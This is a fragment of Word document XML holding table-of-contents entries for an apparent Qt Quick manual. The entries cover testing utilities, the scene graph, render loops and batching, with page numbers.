            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Benchmarks</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605439 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>203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40" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Simulating keyboard and mouse events</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605440 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>203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41" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SignalSpy QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605441 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>204</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442" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Scene Graph</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605442 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>205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43" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Scene Graph Structure</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605443 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>205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44" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Nodes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605444 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>206</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45" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Preprocessing</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605445 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>206</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46" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Node Ownership</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605446 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>207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47" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Materials</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605447 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>207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48" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Convenience Nodes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605448 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>208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49" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph and Rendering</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605449 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>208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50" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Threaded</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Render</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loop</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> ("</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>threaded</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>")</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605450 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>208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51" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Non-threaded Render Loops ("basic" and "windows")</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605451 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>210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52" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Custom control over rendering with QQuickRenderControl</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605452 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>212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53" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mixing Scene Graph and OpenGL</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605453 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>213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54" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Custom Items using QPainter</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605454 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>213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55" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Logging Support</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605455 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>213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56" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph Backend</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605456 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>214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57" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Scene Graph Renderer</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605457 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>215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58" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Batching</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605458 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>215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59" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Opaque Primitives</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605459 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>216</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60" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Alpha Blended Primitives</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605460 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>217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61" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mixing with 3D primitives</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605461 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>217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62" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Texture Atlas</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605462 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>218</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63" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Batch Roots</w:t>
        </w:r>
        <w:r>
          <w:rPr>
